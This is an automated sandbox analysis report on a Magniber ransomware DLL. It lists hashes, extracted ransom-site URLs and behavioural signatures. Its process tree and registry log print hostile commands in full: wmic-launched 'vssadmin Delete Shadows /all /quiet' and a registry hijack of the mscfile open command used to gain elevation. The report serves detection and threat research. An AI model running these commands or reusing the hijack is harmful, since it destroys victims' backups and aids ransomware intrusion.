Analysis
-
max time kernel
130s -
max time network
133s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
29-08-2021 11:33
Static task
static1
Behavioral task
behavioral1
Sample
1.dll
Resource
win7v20210408
Behavioral task
behavioral2
Sample
1.dll
Resource
win10v20210408
General
-
Target
1.dll
-
Size
38KB
-
MD5
f6202e6f4b35f20f7c186d0440a85db9
-
SHA1
fe9211e7e811e1826dd401a2a7f1ac92ac8613ad
-
SHA256
f66e9e0a8847f5c0d3a11e1f61fe70f236688474760038e2bc1fbcc637b08fd1
-
SHA512
85a43634be204d888d319b398b742b086cffe0db391588bb304851644c8ef15c27434e794b821e0ed002b540dc41dc83333942867632ce271baa1182a24d3583
Malware Config
Extracted
C:\Users\Admin\Desktop\readme.txt
magniber
http://d2cc88480e784a7002svbdthwdw.ntjflrx6uhwcmfhnn3yewv2wfhtqtjyfkvyrvjz4wuo6uw33yw7sfiid.onion/svbdthwdw
http://d2cc88480e784a7002svbdthwdw.upquote.xyz/svbdthwdw
http://d2cc88480e784a7002svbdthwdw.armythe.club/svbdthwdw
http://d2cc88480e784a7002svbdthwdw.aredata.site/svbdthwdw
http://d2cc88480e784a7002svbdthwdw.whorest.top/svbdthwdw
Signatures
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 12 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 668 1760 cmd.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1152 1760 vssadmin.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1684 1760 cmd.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1716 1760 vssadmin.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2144 1760 vssadmin.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2160 1760 vssadmin.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2620 1760 vssadmin.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2648 1760 cmd.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2788 1760 vssadmin.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2968 1760 vssadmin.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2960 1760 cmd.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1496 1760 vssadmin.exe 39 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1684 set thread context of 1116 1684 rundll32.exe 13 PID 1684 set thread context of 1176 1684 rundll32.exe 12 PID 1684 set thread context of 1228 1684 rundll32.exe 11 -
Interacts with shadow copies 2 TTPs 8 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1496 vssadmin.exe 1152 vssadmin.exe 1716 vssadmin.exe 2144 vssadmin.exe 2160 vssadmin.exe 2620 vssadmin.exe 2788 vssadmin.exe 2968 vssadmin.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000006da4ad786f7081479c196d633f4ef96000000000020000000000106600000001000020000000f09048a878343f929fa7ee8ed909eb0a6ea59e209a6766284cbd1a6c94007de7000000000e80000000020000200000000426a8a7fc02f01d2e501b687d75cb81a1398b4e2529e29e02eec357d1295a5d900000009fec6f2404549e3281390145e7ab6652903658f62fb923bade5c1214810b5daa3f60cb05e6160d5b2b487f61b4f21e8ccd1e5cb00efd0a8f43fb42c71dbab5e42b801f2a2620fbece552510544d3b1661290cfaf337ef97c4e2186d46822e9a06582e8c8fb3d9e839d987f2b2e6b38d6b13aa65e7ba378dd5eda7efd1acbff3155915db6acd7e485b7b54eacd132b0b4400000003fc2c799af3ef1c4fe8d1ec26e3fc5fdc48306c548aa6281bea373cddbd6dab2da48572168a53598252e3b46c73fa38e9dd8571e20104b5651353922136874a4 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "337008840" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000006da4ad786f7081479c196d633f4ef9600000000002000000000010660000000100002000000097d4a5cbb6ccac58a216dad5574cf43b5e95dab7a6ec7cff8c2e3dee8e637cff000000000e8000000002000020000000cfca8ecd0bcbf66cd255ada91ada62b37e2327f90fbf474ff3c550386b17119520000000f6fb24bed1f3d78bcef7441fa3a2b7514a34cc5a35e92df9cd663fbdcf1483d1400000006d8c41721f95b086f1a1937cab5ffd036aed3cfeca073c9dacba40858ca030f76ec4f94700ed5d98e2a05de9ff3ede0a65e62775602a5a75014ae9441a928d35 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5A84CCA1-08CD-11EC-83FC-FEBA24881352} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 009c3538da9cd701 iexplore.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command taskhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Dwm.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command Dwm.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 112 notepad.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1684 rundll32.exe 1684 rundll32.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1228 Explorer.EXE -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 1684 rundll32.exe 1684 rundll32.exe 1684 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1228 Explorer.EXE Token: SeShutdownPrivilege 1228 Explorer.EXE Token: SeIncreaseQuotaPrivilege 784 wmic.exe Token: SeSecurityPrivilege 784 wmic.exe Token: SeTakeOwnershipPrivilege 784 wmic.exe Token: SeLoadDriverPrivilege 784 wmic.exe Token: SeSystemProfilePrivilege 784 wmic.exe Token: SeSystemtimePrivilege 784 wmic.exe Token: SeProfSingleProcessPrivilege 784 wmic.exe Token: SeIncBasePriorityPrivilege 784 wmic.exe Token: SeCreatePagefilePrivilege 784 wmic.exe Token: SeBackupPrivilege 784 wmic.exe Token: SeRestorePrivilege 784 wmic.exe Token: SeShutdownPrivilege 784 wmic.exe Token: SeDebugPrivilege 784 wmic.exe Token: SeSystemEnvironmentPrivilege 784 wmic.exe Token: SeRemoteShutdownPrivilege 784 wmic.exe Token: SeUndockPrivilege 784 wmic.exe Token: SeManageVolumePrivilege 784 wmic.exe Token: 33 784 wmic.exe Token: 34 784 wmic.exe Token: 35 784 wmic.exe Token: SeIncreaseQuotaPrivilege 1052 WMIC.exe Token: SeSecurityPrivilege 1052 WMIC.exe Token: SeTakeOwnershipPrivilege 1052 WMIC.exe Token: SeLoadDriverPrivilege 1052 WMIC.exe Token: SeSystemProfilePrivilege 1052 WMIC.exe Token: SeSystemtimePrivilege 1052 WMIC.exe Token: SeProfSingleProcessPrivilege 1052 WMIC.exe Token: SeIncBasePriorityPrivilege 1052 WMIC.exe Token: SeCreatePagefilePrivilege 1052 WMIC.exe Token: SeBackupPrivilege 1052 WMIC.exe Token: SeRestorePrivilege 1052 WMIC.exe Token: SeShutdownPrivilege 1052 WMIC.exe Token: SeDebugPrivilege 1052 WMIC.exe Token: SeSystemEnvironmentPrivilege 1052 WMIC.exe Token: SeRemoteShutdownPrivilege 1052 WMIC.exe Token: SeUndockPrivilege 1052 WMIC.exe Token: SeManageVolumePrivilege 1052 WMIC.exe Token: 33 1052 WMIC.exe Token: 34 1052 WMIC.exe Token: 35 1052 WMIC.exe Token: SeShutdownPrivilege 1228 Explorer.EXE Token: SeIncreaseQuotaPrivilege 784 wmic.exe Token: SeSecurityPrivilege 784 wmic.exe Token: SeTakeOwnershipPrivilege 784 wmic.exe Token: SeLoadDriverPrivilege 784 wmic.exe Token: SeSystemProfilePrivilege 784 wmic.exe Token: SeSystemtimePrivilege 784 wmic.exe Token: SeProfSingleProcessPrivilege 784 wmic.exe Token: SeIncBasePriorityPrivilege 784 wmic.exe Token: SeCreatePagefilePrivilege 784 wmic.exe Token: SeBackupPrivilege 784 wmic.exe Token: SeRestorePrivilege 784 wmic.exe Token: SeShutdownPrivilege 784 wmic.exe Token: SeDebugPrivilege 784 wmic.exe Token: SeSystemEnvironmentPrivilege 784 wmic.exe Token: SeRemoteShutdownPrivilege 784 wmic.exe Token: SeUndockPrivilege 784 wmic.exe Token: SeManageVolumePrivilege 784 wmic.exe Token: 33 784 wmic.exe Token: 34 784 wmic.exe Token: 35 784 wmic.exe Token: SeIncreaseQuotaPrivilege 1052 WMIC.exe -
Suspicious use of FindShellTrayWindow 10 IoCs
pid Process 1228 Explorer.EXE 1228 Explorer.EXE 1228 Explorer.EXE 920 iexplore.exe 1228 Explorer.EXE 1228 Explorer.EXE 1228 Explorer.EXE 1228 Explorer.EXE 1228 Explorer.EXE 1228 Explorer.EXE -
Suspicious use of SendNotifyMessage 7 IoCs
pid Process 1228 Explorer.EXE 1228 Explorer.EXE 1228 Explorer.EXE 1228 Explorer.EXE 1228 Explorer.EXE 1228 Explorer.EXE 1228 Explorer.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 920 iexplore.exe 920 iexplore.exe 2132 IEXPLORE.EXE 2132 IEXPLORE.EXE 2132 IEXPLORE.EXE 2132 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1228 wrote to memory of 112 1228 Explorer.EXE 29 PID 1228 wrote to memory of 112 1228 Explorer.EXE 29 PID 1228 wrote to memory of 112 1228 Explorer.EXE 29 PID 1228 wrote to memory of 304 1228 Explorer.EXE 30 PID 1228 wrote to memory of 304 1228 Explorer.EXE 30 PID 1228 wrote to memory of 304 1228 Explorer.EXE 30 PID 1228 wrote to memory of 784 1228 Explorer.EXE 31 PID 1228 wrote to memory of 784 1228 Explorer.EXE 31 PID 1228 wrote to memory of 784 1228 Explorer.EXE 31 PID 1228 wrote to memory of 548 1228 Explorer.EXE 33 PID 1228 wrote to memory of 548 1228 Explorer.EXE 33 PID 1228 wrote to memory of 548 1228 Explorer.EXE 33 PID 548 wrote to memory of 1052 548 cmd.exe 36 PID 548 wrote to memory of 1052 548 cmd.exe 36 PID 548 wrote to memory of 1052 548 cmd.exe 36 PID 304 wrote to memory of 920 304 cmd.exe 37 PID 304 wrote to memory of 920 304 cmd.exe 37 PID 304 wrote to memory of 920 304 cmd.exe 37 PID 1684 wrote to memory of 932 1684 rundll32.exe 40 PID 1684 wrote to memory of 932 1684 rundll32.exe 40 PID 1684 wrote to memory of 932 1684 rundll32.exe 40 PID 1684 wrote to memory of 828 1684 rundll32.exe 41 PID 1684 wrote to memory of 828 1684 rundll32.exe 41 PID 1684 wrote to memory of 828 1684 rundll32.exe 41 PID 828 wrote to memory of 1892 828 cmd.exe 44 PID 828 wrote to memory of 1892 828 cmd.exe 44 PID 828 wrote to memory of 1892 828 cmd.exe 44 PID 668 wrote to memory of 1668 668 cmd.exe 50 PID 668 wrote to memory of 1668 668 cmd.exe 50 PID 668 wrote to memory of 1668 668 cmd.exe 50 PID 1684 wrote to memory of 1772 1684 cmd.exe 56 PID 1684 wrote to memory of 1772 1684 cmd.exe 56 PID 1684 wrote to memory of 1772 1684 cmd.exe 56 PID 1668 wrote to memory of 932 1668 CompMgmtLauncher.exe 58 PID 1668 wrote to memory of 932 1668 CompMgmtLauncher.exe 58 PID 1668 wrote to memory of 932 1668 CompMgmtLauncher.exe 58 PID 1772 wrote to memory of 1880 1772 CompMgmtLauncher.exe 59 PID 1772 wrote to memory of 1880 1772 CompMgmtLauncher.exe 59 PID 1772 wrote to memory of 1880 1772 CompMgmtLauncher.exe 59 PID 920 wrote to memory of 2132 920 iexplore.exe 62 PID 920 wrote to memory of 2132 920 iexplore.exe 62 PID 920 wrote to memory of 2132 920 iexplore.exe 62 PID 920 wrote to memory of 2132 920 iexplore.exe 62 PID 1176 wrote to memory of 2508 1176 Dwm.exe 68 PID 1176 wrote to memory of 2508 1176 Dwm.exe 68 PID 1176 wrote to memory of 2508 1176 Dwm.exe 68 PID 1176 wrote to memory of 2520 1176 Dwm.exe 70 PID 1176 wrote to memory of 2520 1176 Dwm.exe 70 PID 1176 wrote to memory of 2520 1176 Dwm.exe 70 PID 2520 wrote to memory of 2572 2520 cmd.exe 72 PID 2520 wrote to memory of 2572 2520 cmd.exe 72 PID 2520 wrote to memory of 2572 2520 cmd.exe 72 PID 2648 wrote to memory of 2696 2648 cmd.exe 77 PID 2648 wrote to memory of 2696 2648 cmd.exe 77 PID 2648 wrote to memory of 2696 2648 cmd.exe 77 PID 2696 wrote to memory of 2736 2696 CompMgmtLauncher.exe 78 PID 2696 wrote to memory of 2736 2696 CompMgmtLauncher.exe 78 PID 2696 wrote to memory of 2736 2696 CompMgmtLauncher.exe 78 PID 1116 wrote to memory of 2844 1116 taskhost.exe 82 PID 1116 wrote to memory of 2844 1116 taskhost.exe 82 PID 1116 wrote to memory of 2844 1116 taskhost.exe 82 PID 1116 wrote to memory of 2856 1116 taskhost.exe 84 PID 1116 wrote to memory of 2856 1116 taskhost.exe 84 PID 1116 wrote to memory of 2856 1116 taskhost.exe 84
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\1.dll,#12⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:932
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:828 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵PID:1892
-
-
-
-
C:\Windows\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:112
-
-
C:\Windows\system32\cmd.execmd /c "start http://d2cc88480e784a7002svbdthwdw.upquote.xyz/svbdthwdw^&1^&39687747^&56^&309^&12"2⤵
- Suspicious use of WriteProcessMemory
PID:304 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://d2cc88480e784a7002svbdthwdw.upquote.xyz/svbdthwdw&1&39687747&56&309&123⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:920 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2132
-
-
-
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:784
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:548 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:2508
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵PID:2572
-
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:2844
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵PID:2856
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵PID:2904
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:932
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1152
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1880
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1716
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:1864
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2144
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2160
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2620
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2736
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2788
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2968
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
PID:2960 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵PID:3020
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1780
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1496